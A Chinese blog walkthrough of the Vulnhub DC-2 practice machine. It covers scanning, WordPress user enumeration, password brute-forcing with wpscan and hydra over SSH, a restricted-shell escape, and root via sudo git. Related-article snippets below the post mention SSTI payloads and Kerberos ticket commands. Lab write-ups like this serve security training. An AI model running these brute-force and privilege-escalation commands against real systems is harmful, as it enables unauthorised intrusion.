Vulhub-DC-2靶场通关攻略

最新推荐文章于 2024-04-29 00:03:03 发布
最新推荐文章于 2024-04-29 00:03:03 发布
阅读量722 收藏 6
点赞数
分类专栏: 靶场与CTF系列 文章标签: linux debian php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51339377/article/details/123538184
版权 
arp-scan -l

nmap -sV -p- 192.168.109.140

也可以执行如下命令 可以探测目标主机是否存活 
nmap -T4 -sP 192.168.109.140

也可以尝试如下的命令  -A是主动扫描 -p设置的是端口  -oN可以把结果输出到文件 结果保存在root目标下 
nmap -T4 -A 192.168.109.140 -p 1-65535 -oN haha.txt
想要访问可以进入如下目录 
C:\Windows\System32\drivers\etc\hosts
kali中的hosts文件也需要修改 增加如下记录 
/etc/hosts

进入网页后 这个 wordpress的cms网站 这个网站除去漏洞 还是非常优秀的
此时直接访问相应的ip地址就可以直接访问相应的网站了  输入dc-2也可以
修改完hosts文件 然后可以访问以后 接下来可以尝试对其进行扫描  -o表示可以输出到一个文件中 -h后面可以写能被解析的域名 也可以直接写ip地址 
nikto -h dc-2 -o nihao.txt
发现了/wp-login.php  直接访问进入一个用户名和密码的登录位置 
http://dc-2/wp-login.php

接下来我们需要扫描发现wordpress的用户 
wpscan --url dc-2 -e u
(接下来是软件数据库更新问题的解决部分)
可以先下载包到本地 
wget http://blog.dsb.ink/wpscan/wp.zip
mv wp.zip /var/www/html/
如果kali无法直接下载 可以windows直接访问 http://blog.dsb.ink/wpscan/wp.zip 再把这个文件放到/var/www/html下 
cd /var/www/html
unzip wp.zip
dpkg -L wpscan | grep updater
/usr/share/rubygems-integration/all/gems/wpscan-3.8.1/lib/wpscan/db/updater.rb
vim /usr/share/rubygems-integration/all/gems/wpscan-3.8.1/lib/wpscan/db/updater.rb
按住shift+冒号 然后输入 set number回车 之后我们找到81行
之后我们改成本机地址 
接下来重启服务 
service apache2 start
然后再去更新  就可以更新成功了 
wpscan --update
之后再继续刚才的操作 
wpscan --url dc-2 -e u
扫描到了三个用户 admin jerry tom
根据flag1的提示 提示我们使用软件 cewl    会搜集可能的密码 行文习惯等 
cewl dc-2 -w pass.txt
vi username.txt

此时用户名和密码都到位了 
接下来可以 用工具 可以专门用来破解wordpress
其会自动定位到后台的登录地址 并进行穷举破解wordpress模板的用户名和密码 
wpscan --url dc-2 -U username.txt -P pass.txt
其实也可以使用神器burpsuite进行破解
接下来我们可以通过账户和密码尝试进行登录
Tom的账户登录以后并没有什么内容 所以就不做演示了
接下来既然有字典 不妨再使用工具hydra对ssh的密码进行一下穷举破解 看会不会有意外收获
而且此时ssh的端口不是默认的22  已经被管理员修改了 所以需要-s指定端口 
hydra -L username.txt -P pass.txt 192.168.109.140 ssh -s 7744
穷举成功获得ssh密码
接下来可以尝试登录ssh 
ssh tom@192.168.109.140 -p 7744
ls
发现权限不够 连cat都用不了
接下来要尝试提权 
echo $PATH   #看一下自己是什么命令行
ls usr/bin  #确定一下自己可以使用什么命令
vi flag3.txt
根据提示 接下来要使用su进行提权
以下命令  按下键盘的a 就可以调用/bin/sh命令行 
BASH_CMDS[a]=/bin/sh
发现依然被禁用掉了
接下来可以使用终极命令:  把高级权限的命令行也加到自己的path中
此时就可以使用cat了 
export PATH=PATH:/bin
export PATH=PATH:/sbin:/bin
可以尝试提权到jerry  
PS:经过尝试jerry的账户没有办法被直接ssh登录 但是通过tom的账户su后输入密码就可以成功切换账户 
su jerry
#adipiscing
cd ~    #回到自己的home目录
sudo -l  #查看可以以root权限使用什么命令
git提权  git在查看帮助文档的时候是可以敲命令的  在下面变白以后  命令前面加个感叹号即可 
sudo git -p --help  #这条命令有时候不能用
sudo git help config
此时已经提权到root了 可以执行root权限了
本质是借用git的root权限执行命令
Simon_Smith
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulhub靶机通关)BoredHackerBlog: Social Network 2.0---hard_socnet2
yang1234567898的博客
01-07 3498
靶机下载地址:BoredHackerBlog: Social Network 2.0 ~ VulnHub 最终只拿到了本地权限,root权限的提升涉及逆向工程、缓冲区溢出的源码审计,还在摸索 首先,必须保证靶机、kali是通过桥接模式在同一网段 主机发现: 打开kali,通过ifconfig查看主机网段 nmap扫描网段: nmap 192.168.43.0/24 找到靶机ip,开放了22、80、8000端口 获取webshell: 先访问80端口,是
vulhub靶场文件(不用积分)
05-18
我下的挺慢,估计其他人也有这个情况。 使用Vulhub一键搭建漏洞测试靶场,下载日期2020/05/18。 kali下安装命令 apt-get install docker.io apt-get install docker-compose cd cd /vulhub/flask/ssti service docker start docker-compose up -d
DC-DC变换器Simulink仿真模型
08-07
本人在Simulink平台搭建的DC-DC变换器仿真模型,可以使用构成你自己模型的一部分。
HCIE-DC-数据中心面试宝典
09-24
HCIE-DC-数据中心面试宝典 HCIE-DC-数据中心面试宝典 HCIE-DC-数据中心面试宝典
prime1--vulnhub靶场通关教程
m0_74402888的博客
04-29 1699
是一个常用的命令行工具,用于从或向服务器传输数据,支持多种协议,如 HTTP、HTTPS、FTP 等。如果你得到了任何正确的参数,就按照下面的步骤操作。漏洞查找工具,可以通过操作系统或cms的版本号搜索到相应漏洞,通过查看说明即可找到漏洞利用方法。之前扫到了ssh,http wordpress,那密码对应的是什么服务呢。在现实生活中的渗透测试中,我们应该使用我们的工具来深入挖掘一个网站。//查看location.txt文件,你将得到下一步的行动指示//vm 编辑--查看虚拟网络编辑器,看到靶机的网段。
DC-DC PCB layout 指导.docx
06-18
DC-DC PCB layout 指导.docx
AC-DC变换器_multisim_AC-DC_
09-29
Multisim9文件\模电实验图----AC-DC变换器
vulhubDC-2
crowsec
11-03 292
微信公众号:乌鸦安全 扫取二维码获取更多信息! 01 靶机信息 https://www.vulnhub.com/?q=dc-2 Name: DC: 2 Date release: 22 Mar 2019 Author: DCAU Series: DC Web page: http://www.five86.com/dc-2.html 靶机描述: DESCRIPTIONMuch like DC-1, DC-2 is another purposely built vulnerable .
vulnhub--DC2
weixin_55129870的博客
05-12 1227
环境:kali、DC2靶机 DC2靶机默认桥接模式,开启前改成net模式,保证kali和DC2在同一局域网中。(也可都是桥接模式,我比较习惯net模式) ifconfig查看kaliIP地址:192.168.44.131 查看C段,准备C段扫描,在虚拟机编辑--虚拟网络编辑器中, 得知网段192.168.44.0/24,使用nmap扫描存活主机 nmap -sP 192.168.44.0/24 #扫描IP段的所有IP地址 一般都会扫描出5个存活主机,出去较大的,较小的,得知.
Vulhub-DC-1靶场通关攻略
weixin_51339377的博客
03-16 3514
靶场环境配置: 修改为usb1.0同时新建网络,把网络修改为NAT即可 首先开启靶机环境和kali黑客机器环境 通过NAT模式可以保证两者处于同一个内网环境中 切记 vmware和virtualbox的虚拟网卡可能网段不同 所以要保证kali和靶机在同一个网段 否则无法扫描到相应的靶机 1.第一步 通过kali中自带的一个工具 arp-scan进行内网存活主机探测 arp-scan -l 2.接下来可以借助nmap对目标进行扫描 其中 -sV服务指纹识别 可以探测目标系统...
VulnHubDC-2
qq_45434762的博客
03-22 359
一个粗糙的端口扫描通过对目标主机进行端口探测,发现只开放了80端口,那就先访问一下看当我们通过IP访问的时候,会自动跳转成 http://dc-2我们需要在/etc/hosts 文件中...
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
DC-DC稳压电源应用电路设计攻略
01-12
在电子产品设计过 程中,电源通常是必不可少的部分,很多设备(尤其是使用电池的设备)的电源都是以DC-DC为主的。这些电源一般有三种拓扑结构,即人们熟知的buck、 boost和buck-boost(也叫inverting),分别用于...
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-07 2035
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
Vulhub-DC-1靶场实战》
weixin_47118413的博客
07-06 2164
DC系列目前总共有9个靶机,本次靶机是DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。
Web安全——穷举爆破上篇(仅供学习)
钟言的博客
09-02 4184
本篇为Web安全的穷举篇,详细内容包含了二、常见的服务 1、burpsuite 穷举后台密码 2、burpsuite 对 webshell 穷举破解密码3、有 token 防御的网站后台穷举破解密码3.1 burpsuite 设置宏获取 token 对网站后台密码破解3.2 编写脚本获取token 对网站后台密码破解4、针对有验证码后台的穷举方法 4.1 cookie 不存在不验证绕过 4.2 后台登录验证码没销毁进行穷举4.3 网站后台验证码识别穷举密码 5、phpmyadmin 密码穷举 6、一句话等等
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解
qq_58091216的博客
09-25 662
13. 我们切换语句进入shell,执行whoami查看当前权限,执行ls查看当前目录下文件,切换到root目录,查看文件,发现cat thefinalflag.txt文件。15. 此时我们查看 /etc/passwd 文件,发现存在 flag4 用户,我们也可以使用 hydra 进行爆破。2) 查看数据库,切换到drupaldb数据库,查看查找默认的Drupal user 表,发现admin信息。5. 虚拟机开启之后需要登录,我们不知道密码,需要探活ip地址,网段知道:192.168.52.0/24。
ssti-lab靶场通关
09-02
为了通关ssti-lab靶场,你可以按照以下步骤进行操作: 1. 首先,从上一个数据库中找到的password字典中获取到mssql的账户密码。 2. 使用这个账户密码进行mssql的暴力破解,以获得访问权限。 3. 一旦你获得了访问权限,你可以使用SSTI有效载荷发生器来执行特定类型的Java SSTI攻击。该有效载荷发生器可以生成针对Java SSTI的payload,启发于${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)...}。 4. 另外,你还可以使用Rubeus工具来申请访问自身的可转发服务票据。通过运行命令".\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:bd2cf5e6a8f89ed5b02d3d7fcf5e88c7 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt",你可以生成一个可转发的服务票据文件,以便在后续攻击中使用。 通过以上步骤,你可以成功通关ssti-lab靶场。请注意,在进行任何攻击前,确保你有合法的授权和使用权,并且遵守法律法规。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [WP-春秋云镜-Brute4Road靶场通关完全指南](https://blog.csdn.net/qq_45234543/article/details/128482984)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [ssti-payload:SSTI有效载荷生成器](https://download.csdn.net/download/weixin_42128558/15099898)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Simon_Smith

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值